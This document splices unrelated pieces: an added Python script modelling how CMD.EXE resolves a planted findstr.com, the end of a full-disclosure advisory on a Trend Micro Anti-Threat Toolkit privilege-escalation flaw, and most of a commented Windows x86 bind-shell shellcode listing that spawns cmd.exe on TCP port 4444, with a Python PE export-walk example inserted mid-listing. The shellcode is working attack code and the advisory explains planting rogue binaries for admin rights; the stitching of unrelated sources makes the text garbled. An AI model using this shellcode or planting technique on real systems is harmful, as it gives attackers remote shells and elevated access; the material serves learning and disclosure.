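
```python
# Added example, not Trend Micro's or the advisory author's code: lists commands a
# batch script invokes without path or extension and shows where CMD.EXE would
# resolve them. SCRIPT and FILES are constructed to mirror batCollector.bat; the
# PATH/PATHEXT values are Windows defaults and the resolver is an approximation.
import re
from typing import Callable, Iterable, List, Optional, Tuple

PATHEXT = [".COM", ".EXE", ".BAT", ".CMD", ".VBS", ".VBE", ".JS", ".JSE", ".WSF", ".WSH", ".MSC"]
SYSTEM_PATH = [r"C:\Windows\system32", r"C:\Windows", r"C:\Windows\System32\Wbem"]

# Batch-internal commands are never looked up on disk.
INTERNAL = {"echo", "set", "setlocal", "endlocal", "cd", "for", "if", "goto", "call",
            "exit", "rem", "do", "pushd", "popd", "type", "copy", "del", "md", "rd"}
# A command name starts a line, or follows '(' (optionally quoted, as in for /f), '|' or '&'.
CMD_START = re.compile(r"""(?:^|\(\s*['"]?|\||&&?)\s*([^\s"'()|&]+)""")


def bare_commands(script: str) -> List[Tuple[int, str]]:
    """(line number, name) for every external command given without a path or extension."""
    found = []
    for n, raw in enumerate(script.splitlines(), 1):
        line = raw.strip().lstrip("@")
        if not line or line.startswith("::"):
            continue
        for m in CMD_START.finditer(line):
            name = m.group(1)
            if name.lower() in INTERNAL or "\\" in name or ":" in name or "." in name:
                continue
            found.append((n, name))
    return found


def resolve_like_cmd(name: str, cwd: str, path_dirs: Iterable[str],
                     exists: Callable[[str], bool], pathext: Iterable[str] = PATHEXT) -> Optional[str]:
    """Approximate CMD.EXE's search for a bare name: the current directory is tried
    before every PATH entry, and within a directory every PATHEXT extension in order,
    so a planted cwd\\findstr.com wins over system32\\findstr.exe."""
    for directory in [cwd, *path_dirs]:
        for ext in pathext:
            candidate = f"{directory}\\{name}{ext}"
            if exists(candidate):
                return candidate
    return None


# Constructed excerpt mirroring the advisory's batCollector.bat (arguments invented).
SCRIPT = r"""@echo off
setlocal disableDelayedExpansion
set wd=%~dp0
cd /d %wd%
for /f "tokens=*" %%a in ('findstr BatCollector= ..\..\config.ini') do (
    set line=%%a
)
REG EXPORT HKLM\SOFTWARE\Example exported.reg
"""

ATTK_DIR = r"C:\Users\victim\Downloads\TrendMicro AntiThreat Toolkit\HC_ATTK"
# Constructed file layout: the real tools in system32 plus one attacker-planted file.
FILES = {p.lower() for p in [
    r"C:\Windows\system32\findstr.exe",
    r"C:\Windows\system32\reg.exe",
    ATTK_DIR + r"\findstr.com",
]}


def exists(path: str) -> bool:
    return path.lower() in FILES


if __name__ == "__main__":
    for n, name in bare_commands(SCRIPT):
        print(f"line {n}: '{name}' resolves to {resolve_like_cmd(name, ATTK_DIR, SYSTEM_PATH, exists)}")
```

With one planted findstr.com in HC_ATTK, findstr resolves to the planted file while REG still resolves to system32; writing %SystemRoot%\System32\findstr.exe in the script removes the lookup entirely.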
Vulnerability #3:
~~~~~~~~~~~~~~~~~
The executable self-extractors fail to restrict (at least write)
access to this directory, i.e. they do not limit write access to
members of the "Administrators" group and leave it open to
UNPRIVILEGED users: this is BEGINNER'S error #3.
In standard installations of Windows, where the qUACkery-controlled
user account created during setup is used, this UNPROTECTED directory
is therefore writable by the UNPRIVILEGED user who can place a rogue
findstr.com/findstr.exe/findstr.bat/findstr.cmd and
REG.com/REG.exe/REG.bat/REG.cmd there ... and gains administrative
privileges!
Additionally an UNPRIVILEGED attacker can add arbitrary command
lines to the UNPROTECTED batch script batCollector.bat between its
creation and its execution, or replace it completely.
Again see <https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
and <https://capec.mitre.org/data/definitions/471.html>,
plus <https://cwe.mitre.org/data/definitions/732.html>,
<https://cwe.mitre.org/data/definitions/377.html>,
<https://cwe.mitre.org/data/definitions/379.html>
and <https://capec.mitre.org/data/definitions/29.html>
stay tuned, and FAR AWAY from so-called security products:
their "security" is typically worse than that of the products
they claim to protect!
Stefan Kanthak
PS: the TrendMicro Anti-Threat Toolkit inspected in October 2019
was built from scrap: the developers used Visual Studio 2008
(end-of-life for two years), linked against an outdated and
vulnerable LIBCMT, shipped an outdated and vulnerable cURL 7.48
plus an outdated and vulnerable libeay32.dll 1.0.1.17 (OpenSSL
1.0.1 has been end-of-life for more than 3 years; the last version
was 1.0.1.20).
This POOR (really: TOTAL lack of proper) software engineering
alone disqualifies this vendor and its "security" products!
JFTR: "they'll never come back" (really: developers SELDOM learn)
<https://seclists.org/fulldisclosure/2010/Sep/332>
<https://seclists.org/fulldisclosure/2015/Dec/128>
Timeline:
~~~~~~~~~
2019-10-23 sent reports for both vulnerabilities to vendor
2019-10-25 vendor acknowledged receipt
2020-01-07 CVE-2019-20358 assigned by vendor
2020-01-29 updated advisory published by vendor
Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
571 bytes small Microsoft Windows x86 dynamic bind shell and null-free shellcode.
61ae8434a5edb8b37775ebb965df9ff6
# Shellcode Title: Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
# Shellcode Author: Bobby Cooke
# Date: 2020-01-30
# Technique: PEB & Export Directory Table
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Shellcode Function: When executed, this shellcode creates a cmd.exe bind shell, using the CreateProcessA function on TCP port 4444, on all IP interfaces.
# Reason for Creating: When learning x86 Windows dynamic shellcoding, I experienced great difficulty in finding a detailed bind shell example to learn from. There are many great examples for creating dynamic MessageBox shellcode, dynamic bind shellcode for x86 Linux, and many examples of Windows version-dependent shellcode with hardcoded library addresses. Metasploit has a great, compact, reliable, dynamic Windows x86 bind shellcode, but trying to reverse engineer it, to learn, is no small task. Metasploit's payload is great because it uses the best known shellcoding shortcut techniques. Unfortunately for the security researcher new to x86 Windows shellcoding, these shortcuts are very advanced concepts to take on right from the start. Hopefully this horribly large shellcode will help someone learn x86 dynamic Windows shellcoding more easily than the path I took.
# Special Thanks & Credits to: Skape, 0xDarkVortex/paranoidninja, Corelan, Offensive Security, Vivek & Pentester Academy, Tulpa, sh3llc0d3r
# Create a new stack frame
push ebp ; push current base pointer to the stack
mov ebp, esp ; Set Base Stack Pointer for new Stack-Frame
sub esp, 0x60 ; Decrement the stack by 96 to create space for saving pointers
# Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x4], esp ; save PTR to string at bottom of stack (ebp)
# Find Base Address of the kernel32.dll Dynamically Linked Library
; - In Windows, the FS Segment Register will always point to the Thread Environment Block (TEB).
; - This shellcode is dynamic & does not rely on any hardcoded addresses.
; - The addresses in the comments are used as an example and will be different for you.
; - The easiest way to get the WinDbg commands to work is to connect to the Windows Symbol Server.
; - On new versions of Windows, kernel32.dll is the 3rd dll in the Initialization Order Module List.
; - On older versions of Windows, kernel32.dll was the 2nd dll. Now the 2nd dll is kernelbase.dll.
; - Interestingly kernelbase.dll also has functions like LoadLibraryA & GetProcAddress.
; - kernelbase.dll can be used instead of kernel32.dll sometimes, but we will stick with kernel32.dll.
xor eax, eax ; clear eax register
mov eax, [fs:eax+0x30] ; #1| Get PEB Address from within the TEB; leveraging the FS Register.
; WinDbg> !teb
; TEB at 002e9000
; WinDbg> dt nt!_TEB 002e9000
; +0x030 ProcessEnvironmentBlock : 0x002e8000 _PEB
; EAX = 0x002e8000 (Address_of_PEB)
mov eax, [eax+0xc] ; #2| Get the LDR Address from within the PEB.
; WinDbg> dt nt!_PEB 002e8000
; +0x00c Ldr : 0x77becb80 _PEB_LDR_DATA
; EAX = 0x77becb80 (Address_of_LDR)
mov eax, [eax+0x1c] ; #3| Get the first entry in the Initialization Order Module List (ntdll.dll)
; WinDbg> dt nt!_PEB_LDR_DATA 0x77becb80
; +0x01c InInitializationOrderModuleList : _LIST_ENTRY
; WinDbg> db 0x77becb80+1c
; 77becb9c 90 1d 5f 00 // First Entry is 0x005f1d90 (reverse for Little Endian)
; WinDbg> db 0x5f1d90
; #00#01#02#03#04#05#06#07#08#09#0a#0b
; 005f1d90 38 26 5f 00 9c cb be 77-00 00 ad 77
; - we see that 0x5f1d90+0x8 is the base address of ntdll.dll - 0x77ad0000
; - ModLoad: 77ad0000 ntdll.dll
; - We also see that the next entry in the list is at 0x005f2638
; EAX = 0x005f1d90 (First Entry of InInitializationOrderModuleList - ntdll.dll)
; #4| Get the second entry in the Initialization Order Module List (kernelbase.dll)
mov ebx, eax ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00
mov eax, [ebx] ; - Avoid null byte
; WinDbg> dt nt!_LIST_ENTRY 0x5f1d90
; +0x000 Flink : 0x005f2638 _LIST_ENTRY
; WinDbg> db 0x005f2638
; 005f2638 78 22 5f 00 90 1d 5f 00-00 00 56 75
; - We see that 0x005f2638+0x8 is the base address of kernelbase.dll - 0x75560000
; - ModLoad: 75560000 C:\Windows\System32\KERNELBASE.dll
; - We also see that the next entry in the list is at 0x005f2278
; EAX = 0x005f2638 (Second Entry of InInitializationOrderModuleList - kernelbase.dll)
; #5| Get the third entry in the Initialization Order Module List (kernel32.dll)
mov ebx, eax ; - Should be 'mov eax, [eax]', but the opcode contains a null byte 8B00
mov eax, [ebx] ; - Avoid null byte
; WinDbg> dt nt!_LIST_ENTRY 0x005f2638
; +0x000 Flink : 0x005f2278 _LIST_ENTRY
; WinDbg> db 0x005f2278
; 005f2278 9c cb be 77 38 26 5f 00-00 00 22 76
; - We see that 0x005f2278+0x8 is the base address of kernel32.dll - 0x76220000
; - ModLoad: 76220000 C:\Windows\System32\KERNEL32.DLL
; EAX = 0x005f2278 (Third Entry of InInitializationOrderModuleList - kernel32.dll)
mov eax, [eax+0x8] ; move the kernel32.dll base address into the EAX register
; EAX = 0x76220000 (Base address of kernel32.dll)
mov [ebp-0x8], eax ; Save the base address of kernel32.dll in the 2nd from bottom position on our stack
# Find Base Address of GetProcAddress Symbol
; - Now that we have the base address of kernel32.dll, we will use it to find the address for the Symbol(function) GetProcAddress.
; - GetProcAddress() will then be used to find the addresses of all other Symbols(functions) that we need.
; - The Export Table technique is used to find the address of GetProcAddress (as detailed in Skapes Windows Shellcoding Paper).
mov ebx, [eax+0x3c] ; save Relative Virtual Address (RVA/Offset) of New_Exe_Header to ebx.
; WinDbg> db 0x76220000+3c
; 7622003c f8 00 00 00 // EBX = 0x000000f8 = Offset to New EXE Header
add ebx, eax ; (kernel32.dll baseAddr) + (RVA New_Exe_Header) = Address of New_Exe_Header
; 0x76220000 + 0xf8 = 0x762200f8
; EBX = 0x762200f8 (Address of new Header)
mov ebx, [ebx+0x78] ; (Address of New_Exe_Header) + 0x78 = RVA of Export-Table (DataDirectory[0] of the PE32 optional header)
; WinDbg> db 0x762200f8+0x78
; 76220170 b0 77 07 00 // EBX = 0x000777b0
add ebx, eax ; (kernel32.dll baseAddr) + (RVA Export-Table) = Address of Export-Table
; 0x76220000 + 0x000777b0 = 0x762977b0
; EBX now holds the address of the Export Table for kernel32.dll (0x762977b0)
mov edi, [ebx+0x20] ; PTR to RVA of Name-Pointer Table
; WinDbg> db 0x762977b0+0x20
; 762977d0 e0 90 07 00 // EDI = 0x000790e0
add edi, eax ; (kernel32.dll baseAddr) + (RVA Name-Pointer Table) = Address of Name-Pointer Table
; 0x76220000 + 0x000790e0 = 0x762990e0
mov [ebp-0xC], edi ; save Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
mov ecx, [ebx+0x24] ; PTR to RVA of Ordinal Table
add ecx, eax ; (kernel32.dll baseAddr) + (RVA Ordinal Table) = Address of Ordinal Table
mov [ebp-0x10], ecx ; save PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
mov edx, [ebx+0x1c] ; PTR to RVA of Address Table
add edx, eax ; (kernel32.dll baseAddr) + (RVA Address Table) = Address of Address Table
mov [ebp-0x14], edx ; save PTR to Address Table Address at 5th from bottom of stack (ebp-20)
mov edx, [ebx+0x14] ; Value of Number of Functions/Symbols within the Tables
xor eax, eax ; Counter = 0
loop:
mov edi, [ebp-0xC] ; Address of the Name-Pointer Table
mov esi, [ebp-0x4] ; PTR to string "GetProcAddress",0x00
xor ecx, ecx ; clear ecx register -- used for counters/loops
cld ; clear direction flag, DF=0 -- Process strings from left to right
mov edi, [edi+eax*4] ; Entries in Name Pointer Table are 4 bytes long
; edi = RVA of Nth entry = (Address of Name-Pointer Table) + (Counter * 4)
add edi, [ebp-0x8] ; edi = address of string = (kernel32.dll base addr) + (RVA of Nth entry)
add cx, 0xf ; ecx = length of string to compare = sizeof("GetProcAddress") = 15 (14 Letters + 1 String Terminator Char)
repe cmpsb ; compare first 15 bytes of string. esi cmp edi
; if equal ZF=1, if not ZF=0
jz found ; if strings match end loop, else increment eax and loop again
inc eax ; counter ++
cmp eax, edx ; check if eax = Value of Number of Functions/Symbols within the Tables
jb loop ; If eax < edx (unsigned), restart the loop; otherwise fall through
found:
; The Counter (eax) now holds the position of GetProcAddress within the Name-Pointer Table
mov ecx, [ebp-0x10] ; ecx = Address of Ordinal Table
mov edx, [ebp-0x14] ; edx = Address of Address Table
mov ax, [ecx + eax*2] ; ax = ordinal number = (Address of Ordinal Table) + (counter * 2)
mov eax, [edx + eax*4] ; eax = RVA of function = (Address of Address Table) + (ordinal * 4)
add eax, [ebp-0x8] ; eax = address of GetProcAddress = (RVA of GetProcAddress) + (kernel32.dll base addr)
; Address of GetProcAddress is now in EAX
mov [ebp-0x18], eax ; save Address of GetProcAddress onto Stack 0x18=24; 6th from bottom
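As an added example, and not the shellcode author's code, the same Export Directory walk in Python over a constructed PE32 image, so each offset the listing uses (0x3c, PE+0x78, +0x1c, +0x20, +0x24) can be checked against a known layout. The image builder is synthetic (RVA equals file offset, three fake exports). One deliberate difference from the shellcode is marked in a comment: the loop bound is taken from NumberOfNames (+0x18), whereas the shellcode reads NumberOfFunctions (+0x14), which bounds the address table rather than the name table; the two are usually equal in practice, which is why the shellcode still works.

```python
# Added example, not the shellcode author's code: the Export Directory walk from
# the listing, in Python, over a constructed PE32 image (RVA == file offset, three
# fake exports) so every offset can be checked against a known layout.
import struct
from typing import Dict, Optional


def u16(img: bytes, off: int) -> int:
    return struct.unpack_from("<H", img, off)[0]


def u32(img: bytes, off: int) -> int:
    return struct.unpack_from("<I", img, off)[0]


def cstr(img: bytes, off: int) -> bytes:
    return img[off:img.index(b"\0", off)]


def find_export(img: bytes, name: bytes) -> Optional[int]:
    """RVA of the named export, walking the same fields as the shellcode."""
    pe = u32(img, 0x3C)                       # e_lfanew: offset of "PE\0\0"   (mov ebx,[eax+0x3c])
    export_dir = u32(img, pe + 0x78)          # DataDirectory[0].VirtualAddress (mov ebx,[ebx+0x78])
    names = u32(img, export_dir + 0x20)       # AddressOfNames                  (mov edi,[ebx+0x20])
    ordinals = u32(img, export_dir + 0x24)    # AddressOfNameOrdinals           (mov ecx,[ebx+0x24])
    funcs = u32(img, export_dir + 0x1C)       # AddressOfFunctions              (mov edx,[ebx+0x1c])
    # The shellcode bounds its loop with NumberOfFunctions (+0x14); NumberOfNames (+0x18)
    # is the size of the name table being walked, so it is used here instead.
    n_names = u32(img, export_dir + 0x18)
    for i in range(n_names):
        if cstr(img, u32(img, names + 4 * i)) == name:     # repe cmpsb over the full name + NUL
            ordinal = u16(img, ordinals + 2 * i)            # mov ax,[ecx+eax*2]
            return u32(img, funcs + 4 * ordinal)            # mov eax,[edx+eax*4]
    return None


def build_fake_image(exports: Dict[bytes, int]) -> bytes:
    """Flat PE32 image containing only the headers and tables the lookup touches."""
    PE, EXP, FUNCS, NAMES, ORDS, STRS = 0x80, 0x200, 0x300, 0x340, 0x380, 0x400
    img = bytearray(0x600)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, PE)
    img[PE:PE + 4] = b"PE\0\0"
    struct.pack_into("<H", img, PE + 4 + 20, 0x10B)         # optional header magic: PE32
    struct.pack_into("<II", img, PE + 0x78, EXP, 40)        # export DataDirectory entry (RVA, size)
    ordered = sorted(exports)                               # linkers emit the name table sorted
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions, AddressOfNames at +0x14..+0x20
    struct.pack_into("<IIII", img, EXP + 0x14, len(ordered), len(ordered), FUNCS, NAMES)
    struct.pack_into("<I", img, EXP + 0x24, ORDS)           # AddressOfNameOrdinals
    cursor = STRS
    for i, nm in enumerate(ordered):
        struct.pack_into("<I", img, FUNCS + 4 * i, exports[nm])
        struct.pack_into("<I", img, NAMES + 4 * i, cursor)
        struct.pack_into("<H", img, ORDS + 2 * i, i)
        img[cursor:cursor + len(nm)] = nm
        cursor += len(nm) + 1                                # keep the NUL terminator
    return bytes(img)


if __name__ == "__main__":
    image = build_fake_image({b"LoadLibraryA": 0x10000, b"GetProcAddress": 0x20000, b"WSAStartup": 0x30000})
    print(hex(find_export(image, b"GetProcAddress")))
```

Because the comparison covers the terminator, as the shellcode's 15-byte repe cmpsb does, a longer export whose name merely starts with "GetProcAddress" does not match.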
; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
; Call GetProcAddress(hModule, lpProcName)
; hModule: address of the DLL module that contains the function.
; lpProcName: A Pointer to the beginning of an ASCII string of the functions name; null terminated.
xor edx, edx ; EDX = 0x00000000
push edx ; null terminator for LoadLibraryA string
push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
push 0x7262694c ; rbiL : 7262694c
push 0x64616f4c ; daoL : 64616f4c
push esp ; $lpProcName -- push the address of the "LoadLibraryA" string (2nd argument, pushed first)
push dword [ebp-0x8] ; $hModule -- push the base address of kernel32.dll (1st argument, pushed last)
mov eax, [ebp-0x18] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
; The address of the queried function is returned into the EAX register.
mov [ebp-0x1c], eax ; save Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom
; Call LoadLibraryA(PTR "ws2_32.dll"0x00)
; push "ws2_32",0x00 (Null terminated) to the stack and save pointer
xor eax, eax ; clear eax
mov ax, 0x3233 ; ASCII: 3 = 0x33, ASCII: 2 = 0x32
push eax ; push 0x00,0x00,"23" to stack (for ws2_32.dll)
push 0x5f327377 ; push "_2sw" to the stack (in reverse)
push esp ; push the pointer to the string to the stack
mov ebx, [ebp-0x1c] ; LoadLibraryA Address to ebx register
call ebx ; call the LoadLibraryA Function to load ws2_32.dll
mov [ebp-0x20], eax ; save Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom
; Call GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)
xor edx, edx
mov dx, 0x7075 ; pu : 7075
push edx ; push "up",0x0000 to stack from end of string
push 0x74726174 ; trat : 74726174
push 0x53415357 ; SASW : 53415357
push esp ; push pointer to string to stack for 'WSAStartup',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)
; EAX = WSAStartup Address
mov [ebp-0x24], eax ; save Address of WSAStartup onto Stack 0x24=36; 9th from bottom.
; Call WSAStartup - WSAStartUp(MAKEWORD(2, 2), wsadata_pointer)
; int WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
xor ebx, ebx ; EBX = 0x00000000
mov bx, 0x0190 ; ebx = 0x190 = 400 = sizeof(WSADATA) on 32-bit
sub esp, ebx ; reserve that space on the stack for the WSADATA struct
push esp ; lpWSAData = pointer to the reserved space
push ebx ; wVersionRequired = 0x0190 (the same constant is reused here instead of MAKEWORD(2, 2))
mov eax, [ebp-0x24] ; WSAStartup Address
call eax ; call WSAStartUp() to enable tcp networking
; Call GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)
xor edx, edx
mov dx, 0x4174 ; At : 4174 // "WSASocketA",0x0000 string
push edx ; push "tA",0x0000 to stack from end of string
push 0x656b636f ; ekco : 656b636f
push 0x53415357 ; SASW : 53415357
push esp ; push pointer to string to stack for 'WSASocketA',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)
; EAX = WSASocketA Address
mov [ebp-0x28], eax ; save Address of WSASocketA onto Stack 0x28=40
; Call WSASocketA( AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL);
xor ebx, ebx ; clear ebx
push ebx ; dwFlags = null
push ebx ; g(group) = null
push ebx ; lpProtocolInfo = null
xor ecx, ecx ; clear ecx
mov cl, 6 ; IPPROTO_TCP = 6 // use TCP
push ecx ; push protocol to the stack
inc ebx ; SOCK_STREAM = 1 // for TCP Socket
push ebx ; push type (of socket) to stack
inc ebx ; AF_INET = 2 // Use IPv4
push ebx ; Push Address Family (af) ipv4 to stack
mov eax, [ebp-0x28] ; load address of WSASocketA() into eax
call eax ; Call the WSASocketA() Function
; EAX = Handle to NewSocket
mov [ebp-0x2c], eax ; save Address New Socket Handle onto Stack 0x2c=44
; struct sockaddr_in { AF_INET = 2; p4444 = 0x5c11; INADDR_ANY = 0x00000000; };
xor ebx, ebx ; clear ebx
push ebx ; IP address = INADDR_ANY
push word 0x5c11 ; 0x115c = port 4444
add bl, 2 ; AF_INET = 2
push word bx ; push ipv4 af to stack
mov [ebp-0x30], esp ; save Address of sockaddr_in struct onto Stack 0x30=48
; Call GetProcAddress(PTR *ws2_32.dll, "bind"0x00)
xor ecx, ecx
push ecx ; Null terminate string "bind" on stack
push 0x646e6962 ; dnib : 646e6962 - push "bind"
push esp ; push pointer-to-string to stack for 'bind',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "bind"0x00)
; EAX = bind base-address
mov [ebp-0x34], eax ; save Address of bind onto Stack 0x34=52
; Call bind(ptr socketHandle, ptr sockaddr_in, sizeof(sockaddr_in) = 16);
push byte 16 ; push size of sockaddr_in struct
push dword [ebp-0x30] ; Push pointer to sockaddr_in
push dword [ebp-0x2c] ; push socket handle returned from WSASocketA()
mov eax, [ebp-0x34] ; load address of bind()
call eax ; Call the bind() function
; Call GetProcAddress(PTR *ws2_32.dll, "listen"0x00)
xor ecx, ecx
mov cx, 0x6e65 ; ne : 6e65 // "listen",0x0000 string
push ecx ; push "en",0x00,0x00 to stack
push 0x7473696c ; tsil : 7473696c - push "list" to stack
push esp ; push pointer-to-string to stack for 'listen',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "listen")
; EAX = listen() base-address
mov [ebp-0x38], eax ; save Address of listen() onto Stack 0x38=56
; Call listen(ptr socketHandle, int backlog);
xor ecx, ecx
push ecx ; backlog is used for multiple connections. We only need 1, so set to zero.
push dword [ebp-0x2c] ; push socket handle returned from WSASocketA()
mov eax, [ebp-0x38] ; load address of listen() that we saved to the stack earlier
call eax ; Call the listen() function
; Call GetProcAddress(PTR *ws2_32.dll, "accept"0x00)
xor ecx, ecx
mov cx, 0x7470 ; tp : 7470 // "accept",0x0000 string
push ecx ; push "pt",0x00,0x00 to stack
push 0x65636361 ; ecca : 65636361 - push "acce" to stack
push esp ; push pointer-to-string to stack for 'accept',0x00
push dword [ebp-0x20] ; push base address of ws2_32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *ws2_32.dll, "accept")
; EAX = accept() base-address
mov [ebp-0x3c], eax ; save Address of accept() onto Stack 0x3c=60
; Call accept(ptr socketHandle, ptr sockaddr_in, ptr addrlen(optional))
; sockaddr_in is optional here. It is for filtering the connecting host
xor ecx, ecx
push ecx ; push Null for optional ptr addrlen
push ecx ; push Null for optional ptr sockaddr_in
push dword [ebp-0x2c] ; push socket handle returned from WSASocketA()
mov eax, [ebp-0x3c] ; load address of accept() that we saved earlier
call eax ; Call the accept() function
mov [ebp-0x40], eax ; save Handle to clientSocket, returned from accept(), onto Stack 0x40=64
; struct _PROCESS_INFORMATION {PTR hProcess; PTR hThread; DWORD dwProcessId; DWORD dwThreadId; }
mov edx, 0x646d6363 ; "ccmd"
shr edx, 8 ; edx = "cmd",0x00 // shr edx, 8 = Shifts the edx register to the right 8 bits
push edx
mov [ebp-0x44], esp ; save PTR to String "cmd",0x00 on stack
xor edx, edx ; clear edx register
sub esp, 0x10 ; Decrement the stack by 16 bytes (0x10)
mov [ebp-0x48], esp ; save Address of PROCESS_INFORMATION struct onto Stack 0x48=72
; typedef struct _STARTUPINFOA { DWORD cb; LPSTR lpReserved; LPSTR lpDesktop; LPSTR lpTitle; DWORD dwX; DWORD dwY; DWORD dwXSize; DWORD dwYSize; DWORD dwXCountChars; DWORD dwYCountChars; DWORD dwFillAttribute; DWORD dwFlags; WORD wShowWindow; WORD cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; }
xor edx, edx ; clear edx register
; Redirect STDIN, STDOUT, STDERR to the clientSocket returned from accept() when client connected (similar to dup2 in linux)
push dword [ebp-0x40] ; HANDLE hStdError = Handle to clientSocket
push dword [ebp-0x40] ; HANDLE hStdOutput = Handle to clientSocket
push dword [ebp-0x40] ; HANDLE hStdInput = Handle to clientSocket
push edx ; LPBYTE lpReserved2 = Null
push edx ; WORD cbReserved2 = 0 and WORD wShowWindow = 0 (SW_HIDE), packed into one dword
xor eax, eax ; clear eax register
inc eax ; eax = 1 = STARTF_USESHOWWINDOW
rol eax, 0x08 ; eax = 0x100 = STARTF_USESTDHANDLES
inc eax ; eax = 0x101 = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
push eax ; DWORD dwFlags = 0x101 (use the std handles pushed above, hide the window)
push edx ; DWORD dwFillAttribute = Null
push edx ; DWORD dwYCountChars = Null
push edx ; DWORD dwXCountChars = Null
push edx ; DWORD dwYSize = Null
push edx ; DWORD dwXSize = Null
push edx ; DWORD dwY = Null
push edx ; DWORD dwX = Null
push edx ; PTR lpTitle = Null
push edx ; PTR lpDesktop = Null
push edx ; PTR lpReserved = Null
xor eax, eax ; clear eax register
add al, 0x44 ; DWORD cb = 0x44(68) // Sizeof STARTUP_INFO
push eax ; push cb onto the stack
mov [ebp-0x4c], esp ; save pointer to STARTUP_INFO struct onto Stack 0x4c=76
; Call GetProcAddress(PTR *kernel32.dll, "CreateProcessA"0x00)
xor edx, edx
mov dx, 0x4173 ; As : 4173 // "CreateProcessA",0x0000 string
push edx ; push "sA",0x0000 to stack from end of string
push 0x7365636f ; seco : 7365636f
push 0x72506574 ; rPet : 72506574
push 0x61657243 ; aerC : 61657243
push esp ; push pointer to string to stack for 'CreateProcessA',0x00
push dword [ebp-0x8] ; push base address of kernel32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *kernel32.dll, "CreateProcessA"0x00)
; EAX = CreateProcessA Address
mov [ebp-0x50], eax ; save Address of CreateProcessA onto Stack 0x50=80
; CreateProcessA(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
xor edx, edx ; clear edx register
push dword [ebp-0x48] ; PROCESS_INFORMATION
push dword [ebp-0x4c] ; STARTUP_INFO
push edx ; lpCurrentDirectory = Null
push edx ; lpEnvironment = Null
push edx ; dwCreationFlags = 0/Null
xor eax, eax ; clear eax
inc eax ; bInheritHandles = True = 1
push eax ; push 1 to stack for bInheritHandles
push edx ; lpThreadAttributes = Null
push edx ; lpProcessAttributes = Null
push dword [ebp-0x44] ; lpCmdLine = push PTR to String "cmd",0x00 on stack
push edx ; lpAppName = Null
mov ebx, [ebp-0x50] ; Address for CreateProcessA
call ebx ; create process cmd
; Call GetProcAddress(PTR *kernel32.dll, "ExitProcess"0x00)
xor ecx, ecx
mov ecx, 0x73736501 ; sse : 73736501 = 0x01,"ess" // "ExitProcess",0x0000 string
shr ecx, 8 ; ecx = "ess",0x00
push ecx ; sse : 00737365
push 0x636f7250 ; corP : 636f7250
push 0x74697845 ; tixE : 74697845
push esp ; push pointer to string to stack for 'ExitProcess',0x00
push dword [ebp-0x8] ; push base address of kernel32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *kernel32.dll, "ExitProcess"0x00)
; EAX = ExitProcess Address
mov [ebp-0x54], eax ; save Address of ExitProcess onto Stack 0x54=84
; Call ExitProcess(uExitCode)
xor edx, edx ; edx = 0 (not used by the call)
push eax ; uExitCode = whatever eax holds (the ExitProcess address); the value does not matter
mov eax, [ebp-0x54] ; load the address of ExitProcess
call eax ; ExitProcess() -- does not return
; sub esp, 0x60 = Decrement the stack by 96 bytes (0x60) for shellcode variables
; [ebp-0x4] = PTR to string at bottom of stack (ebp)
; [ebp-0x8] = Save the base address of kernel32.dll in the 2nd from bottom position on our stack
; [ebp-0xC] = Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
; [ebp-0x10] = PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
; [ebp-0x14] = PTR to Address Table Address at 5th from bottom of stack (ebp-20)
; [ebp-0x18] = Address of GetProcAddress onto Stack 0x18=24; 6th from bottom
; [ebp-0x1c] = Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom
; [ebp-0x20] = Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom
; [ebp-0x24] = Address of WSAStartup onto Stack 0x24=36; 9th from bottom.
; [ebp-0x28] = Address of WSASocketA onto Stack 0x28=40
